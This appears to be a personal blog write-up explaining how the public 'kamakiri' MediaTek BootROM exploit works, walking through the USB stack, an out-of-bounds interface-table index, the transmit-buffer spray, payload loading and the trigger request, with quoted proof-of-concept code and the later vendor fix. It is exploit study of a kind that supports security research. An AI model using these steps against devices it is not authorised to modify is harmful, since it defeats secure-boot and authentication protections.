Introduction
I’ve known about the “kamakiri” 🦗 exploit for a while now, and like many others, I’ve even used it in practice, but I never really stopped to understand how it actually works under the hood.
There are quite a lot of public MediaTek BROM exploits floating around, but despite their availability, there isn’t much in the way of clear, detailed explanations of how they function internally.
Because of that, I decided it would be a good idea to sit down and dissect one of them. I chose the original kamakiri exploit since it’s the one I’ve used the most.
FWIW, this isn’t the beginning of a full write-up series on all the MediaTek exploits, I’m just taking notes so I don’t forget how any of this works later (future-me is notoriously unreliable lol).
Background
On MediaTek devices, the BROM, under certain circumstances, exposes a VCOM interface that can be used to unbrick the device with the help of a Download Agent.
Naturally, this interface is typically protected by a set of security measures that prevent arbitrary payload execution or unrestricted memory access.
Since this has already been covered in the heapbait blog post, I won’t go into detail here, but the three main mechanisms are Serial Link Authorization, Download Agent Authentication, and Secure Boot Control.
The reason most of the exploits mentioned earlier were originally developed was to bypass these security measures and achieve arbitrary code execution in the BROM.
From there, this can be used to unlock the bootloader, unbrick the device, or basically do anything else you want.
Origin
Before diving into the technical details, it’s worth taking a step back to look at how and why this exploit came to be.
While it’s unclear how long this vulnerability had been known or exploited privately, the first public mention (and PoC) appeared in 2019, when k4y0z and xyz` on XDA released a method to unlock the bootloader of the Fire TV Stick 4K.
At the time, the only known BROM exploit was amonet, which was already a few years old and had been patched on newer devices.
For those unfamiliar, “kamakiri” is the Japanese word for “mantis”. The exploit takes its name from the device it was first discovered on, the Fire TV Stick 4K, whose codename is “mantis.”
It’s also worth noting that there are two “variants” of this exploit, though in reality they’re quite different under the hood.
The most commonly used one is the “v2” (kamakiri2) variant, which came later and is generally easier to work with. This post will focus on the original one.
USB Stack
To understand the exploit, you first need a rough picture of how the BROM’s USB stack is organized. It’s not complicated, but there are three specific pieces that matter:
- The transmit buffer.
- The echo protocol.
- The interface handler table.
Each one is nothing special on its own, it’s only when you look at them together that things get interesting.
The USB stack layers
Before getting into the buffers, it’s worth understanding how the USB stack is organized, because it’s a bit more layered than you might expect.
At the bottom there’s the raw USB hardware; registers, FIFOs, endpoints. USB_EPFIFOWrite talks to this level directly, writing bytes into the hardware FIFO one at a time:
void USB_EPFIFOWrite(uint8_t nEP, uint16_t nBytes, void *pSrc) { USB_INDEX = nEP;
uint8_t *p = (uint8_t *)pSrc; uint8_t *fifo = (uint8_t *)(nEP * 4 + 0x11100020);
while (nBytes--) { *fifo = *p++; }}Above that sits the ACM layer. USBDL_PutByte and its receive counterpart handle the staging buffers and know about packet boundaries:
void USBDL_PutByte(uint8_t data) { usbacm_tx_buf.data[usbacm_tx_buf.len] = data; usbacm_tx_buf.len++; if (usbacm_tx_buf.len == packet_size) { USB_EPFIFOWrite(...); usbacm_tx_buf.len = 0; }}But there’s another layer on top of all of this that’s easy to miss. At some point during initialization, the BROM calls IO_Init, which sets up a small function pointer table that abstracts over the two supported I/O interfaces, USB and UART:
void IO_Init(IO_INTERFACE vio) { if (vio == IO_USB) { IO_GetData = (code *)0x5E99; // USBDL_GetByte IO_PutData = (code *)0x5EB3; // USBDL_PutByte (wrapper) IO_TX_Flush = (code *)0x7321; // USBDL_Flush } else if (vio == IO_UART) { IO_GetData = (code *)0xD029; // UART_adpt_GetData IO_PutData = (code *)0xD043; // UART_adpt_PutData IO_TX_Flush = (code *)0xD05D; // UART_CheckSendComplete }}Whichever interface gets selected, the command handlers don’t call USBDL_PutByte directly.
Instead they go through a small serialization layer IO_PutData32_Ex, IO_PutData16_Ex, and IO_PutByte_Ex, which breaks values down into individual bytes and feeds them into IO_PutData one at a time:
void IO_PutData32_Ex(uint32_t data32, bool flush_tx) { for (int i = 0; i < 4; i++) { uint8_t byte = data32 >> (24 - i * 8); (*IO_PutData)(&byte, 1, 0xffffffff); } if (flush_tx) (*IO_TX_Flush)();}This means none of the command handlers need to know which interface is active, they just call IO_PutData32_Ex and let the function pointer table sort it out. The full picture looks like this:
The transmit buffer
When the BROM needs to communicate with the host, it doesn’t read from or write to the USB hardware directly.
Instead, it stages data in RAM first. There’s a receive buffer for incoming data and a transmit buffer for outgoing data.
For the receive buffer, incoming bytes from the host land there and get consumed by whatever command handler is currently running.
The transmit buffer is a structure called usbacm_tx_buf, sitting at 0x001060E0 (for MT8167):
struct { uint32_t len; // 0x001060E0 (how many bytes are currently queued) uint8_t data[]; // 0x001060E4 (the actual bytes)} usbacm_tx_buf;len is the write cursor, it tracks how many bytes are currently sitting in data[] waiting to be sent.
Every outgoing byte goes through USBDL_PutByte, which appends it to data[] and bumps len:
void USBDL_PutByte(uint8_t data) { usbacm_tx_buf.data[usbacm_tx_buf.len] = data; usbacm_tx_buf.len++; if (usbacm_tx_buf.len == packet_size) { // 64 on FS, 512 on HS USB_EPFIFOWrite(txpipe->byEP, packet_size, usbacm_tx_buf.data); USB_EP_Bulk_Tx_Ready(txpipe->byEP); usbacm_tx_buf.len = 0; }}Once len hits the packet size, the buffer gets flushed to the hardware FIFO and len resets to zero. The bytes in data[] don’t get cleared, they just sit there in RAM until something else writes over them.
There’s also USBDL_Flush(), which sends whatever’s currently queued without waiting for the buffer to fill up:
void USBDL_Flush(void) { if (nDevState == DEVSTATE_CONFIG && usbacm_tx_buf.len != 0) { nEP = txpipe->byEP; gUSBAcm_IsInEPComplete = false; USB_EPFIFOWrite(nEP, usbacm_tx_buf.len, usbacm_tx_buf.data); USB_EP_Bulk_Tx_Ready(nEP); while (!gUSBAcm_IsInEPComplete) USB_HISR(); usbacm_tx_buf.len = 0; }}Same result, len resets to zero, bytes stay in RAM. This “stale bytes” behavior is going to matter a lot later.
BROM command loop
BROM doesn’t always end up in the command loop, this only happens when it boots into USBDL mode. There are a few reasons this can happen.
The most common ones are a missing or invalid Preloader, a shorted eMMC, or a device that’s simply blank from the factory. Some devices also expose a button combo that forces USBDL mode at boot.
Whatever the cause, once the BROM decides it’s in USBDL mode, it initializes the USB stack and starts waiting for the host to interact with it.
The loop reads a command byte and dispatches it to the appropriate handler:
void BromCmdLoop(void) { BromCmdLoop_Init(); while (true) { uint8_t cmd = IO_GetByte(); IO_PutByte_Ex(cmd, true); // echo cmd switch (cmd) { case 0xD1: BromCmd_Read(CMD_LEN_32, false); break; case 0xD4: BromCmd_Write(CMD_LEN_32, true); break; case 0xE0: BromCmd_SendCert(); break; case 0xFD: BromCmd_Get_HW_Code(); break; // ... } }}There are quite a few commands, but the ones relevant to this exploit are:
0xD1:BromCmd_Read: read arbitrary memory and echo it back0xD4:BromCmd_Write: write arbitrary memory0xE0:BromCmd_SendCert: load a blob into memory at a fixed address
Every one of these handlers echoes its arguments back before doing anything.
The interface handler table
When the BROM receives a USB control request on endpoint 0, it hands it off to USB_Endpoint0_Idle.
This function is responsible for parsing the request and dispatching it to the appropriate handler:
void USB_Endpoint0_Idle(void) { USB_EPFIFORead(0, 8, &cmd);
if ((cmd.bmRequestType & USB_CMD_TYPEMASK) == 0) { // standard requests switch (cmd.bRequest) { case 0x05: stall = USB_Cmd_SetAddress(&ep0info, &cmd); break; case 0x06: stall = USB_Cmd_GetDescriptor(&ep0info, &cmd); break; case 0x09: stall = USB_Cmd_SetConfiguration(&ep0info, &cmd); break; case 0x0b: stall = USB_Cmd_SetInterface(&ep0info, &cmd); break; // ... } return; }
// class specific requests if ((cmd.bmRequestType & 0x60) != 0x20) { USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false); return; }
if ((cmd.bmRequestType != 0xA1) && (cmd.bmRequestType != 0x21)) { USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false); return; }
if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) { (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd); return; }
USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);}Standard requests like SetAddress or GetDescriptor are handled inline whereas class specific requests (identified by bmRequestType having the class bit set) get dispatched through a different path.
For those, the BROM looks up the handler in if_info, a table of interface descriptors sitting at 0x00103780.
Each entry is 0x34 bytes and contains, among other things, a function pointer at offset +0x04:
struct Usb_Interface_Info { char *interface_name; // +0x00 void *if_class_specific_hdlr; // +0x04 (function pointer) uint16_t ifdscr_size; // +0x08 // ...};When a class specific request comes in, the BROM takes cmd.wIndex, uses it as an index into if_info, and calls the handler directly:
(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);There are only three registered interfaces, but nothing stops you from requesting wIndex=200, or wIndex=204, or any other value that lands outside the legitimate interface entries.
Walking through the PoC
Now that we have a somewhat solid understanding of the USB stack, let’s walk through the exploit step by step.
The PoC we’ll be looking at can be found here and there are probably other versions floating around, but they all do the same thing in the end.
Handshake and setup
dev.handshake()dev.write32(0x10007000, 0x22000000)Before anything else, the host needs to establish communication with the BROM. The handshake is a simple four byte sequence.
BROM expects A0 0A 50 05 and responds with the bitwise complement of each byte. Once that’s done, it is ready to accept commands.
If the device was entered via a hardware short on the eMMC, the user also needs to release the short at this point before continuing.
The PoC handles this with a small thread that kicks the watchdog every second while waiting for user input:
thread = UserInputThread()thread.start()while not thread.done: dev.write32(0x10007008, 0x1971) # kick watchdog time.sleep(1)Once the short is released and the thread signals done, execution continues with the rest of the exploit.
The TX buffer spray
The next thing the PoC does is manipulate the TX buffer:
addr = 0x10007050dev.write32(addr, [0xA1000])cnt = 15for i in range(cnt): dev.read32(addr - (cnt - i) * 4, cnt - i + 1)The goal is to get 0x000A1000, the payload address in LE, to land at a specific offset inside usbacm_tx_buf that corresponds to if_info[wIndex].if_class_specific_hdlr for the wIndex we plan to use in the trigger step.
WDT_BASE + 0x50 is used as the scratch address because it falls inside the watchdog register region, one of the memory regions the BROM allows you to access freely.
What the register itself does doesn’t really matter, what matters is that it’s accessible without triggering any access violations.
write32(addr, [0xA1000]) plants 0x000A1000 there. From that point, the loop issues a series of reads with increasing starting addresses and sizes, all anchored around addr.
Each iteration reads one more word than the last, starting one address further back:
i=0: read32(addr - 60, 16)i=1: read32(addr - 56, 15)...i=14: read32(addr - 4, 2) (last word = addr = 0x000A1000)Every one of those reads echoes its data back through USBDL_PutByte, accumulating in the TX buffer. The exact offsets depend on the memory layout of the specific BROM.
The end result is the same. 0x000A1000 ends up sitting at the right offset inside usbacm_tx_buf to overlap with if_info[wIndex].if_class_specific_hdlr.
Loading the payload
For the exploit to work, there has to be a way to upload arbitrary code into memory. Thankfully, BromCmd_SendCert (0xE0) does exactly that.
It was probably designed to receive a certificate blob from the host and load it into memory at 0x100A00 for verification.
def attempt2(d): d.write(b"\xE0") result = d.read(1) d.write(p32(0xA00)) result = d.read(4) payload = load_payload_file("../brom-payload/stage1/stage1.bin") d.write(payload)The host sends 0xA00 as the length, the BROM echoes it back, then reads that many bytes into 0x100A00. On the BROM side:
uint32_t BromCmd_SendCert(void) { uint32_t len = IO_GetData32(); IO_PutData32_Ex(len, true);
if (!bExecOnce) { bExecOnce = true; if (Secure_SCTRL_CERT_IsValidRange(len) < 0xff) { IO_PutData16_Ex(status, true); IO_GetDataBlock8(0x100A00, len, 5); // payload lands here Secure_SCTRL_CERT_Verify(0x100A00); // fails, but doesn't clean up } }
IO_PutData16_Ex(status, true); return status;}The detail here is that the data gets written to memory before verification runs. The cert check will fail since we’re not sending anything valid, but BROM never cleans up the memory afterwards.
The only real constraint is size, the payload must fit within 0xA00 bytes, which is solved by using a two-stage approach.
Pulling the trigger
At this point the two pieces are in place, the payload is sitting at 0x100A00 and usbacm_tx_buf has been sprayed with 0x000A1000 at the right offset. All that’s left is to trigger the jump.
To confirm this, here’s a hexdump of usbacm_tx_buf taken from inside the stage1 payload immediately after it starts running:
001060E0 00 00 00 00 A1 A2 A3 A4 00 0A 10 00 00 0A 10 00 |................|001060F0 00 0A 10 00 00 0A 10 00 00 0A 10 00 00 0A 10 00 |................|len is zero (the buffer was flushed), and 0x000A1000 is sitting repeatedly through data[]. The value at data[16] = 0x1060F4 is what matters, that’s where if_info[204].if_class_specific_hdlr lives:
>>> hex(0x00103780 + 204 * 0x34 + 4)'0x1060F4'0x00103780 is the base address of if_info, 0x34 is the size of each entry, 204 is the index, and +4 is the offset of if_class_specific_hdlr within the entry.
The result lands exactly at 0x1060F4, inside usbacm_tx_buf.data[]. The trigger is a USB control request:
try: udev.ctrl_transfer(0xA1, 0, 0, 204, 0)except usb.core.USBError as e: print(e)0xA1 is bmRequestType with the class bit set (0x20) and the direction bit set (0x80). This translates to a class-specific request from device to host.
wIndex=204 is what gets used to index into if_info. USB_Endpoint0_Idle receives the request and does:
(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);if_info[204].if_class_specific_hdlr contains 0x000A1000 (put there by the spray) so execution jumps straight to the payload at 0x100A00.
The stage1 payload confirms it’s running by sending back 0xA1A2A3A4:
data = d.read(4)if data != b"\xA1\xA2\xA3\xA4": raise RuntimeError("...")If that comes back, the exploit succeeded and the payload is running.
Fixes
The vulnerability was patched at some point, the first chip where it was publicly identified to be fixed is the MT6853, seen in 2021, but it may have been patched earlier on other chips.
The fix itself is straightforward, a simple bounds check on wIndex before the handler dispatch:
// vulnerableif (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) { (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd); return;}
// fixedif (((byte)cmd.wIndex < 3) && (handler = if_info[(byte)cmd.wIndex].if_class_specific_hdlr, handler != NULL)) { (*handler)(); return;}There are only three registered interfaces, so any wIndex >= 3 now gets rejected outright. The OOB access into if_info is no longer possible.
On the BromCmd_SendCert side, the patched BROM also zeroes out the memory at 0x100A00 if verification fails:
if (verify_failed) { memset(0x100A00, 0, len); // clean up on failure}So even if the jump could somehow be triggered, there’d be nothing useful at 0x100A00 to land on.
Conclusion
Seven years. That’s how long it took me to actually sit down and understand an exploit I’ve been using since forever. Better late than never I guess.
And honestly, now that I understand how it works, I’m surprised at how “simple” it actually is, at least compared to a lot of the other exploits that I’ve looked at.
I wasn’t even planning to make this a whole post, this was meant to be my own documentation for future reference, but I figured it might be useful for others as well. I hope it was informative.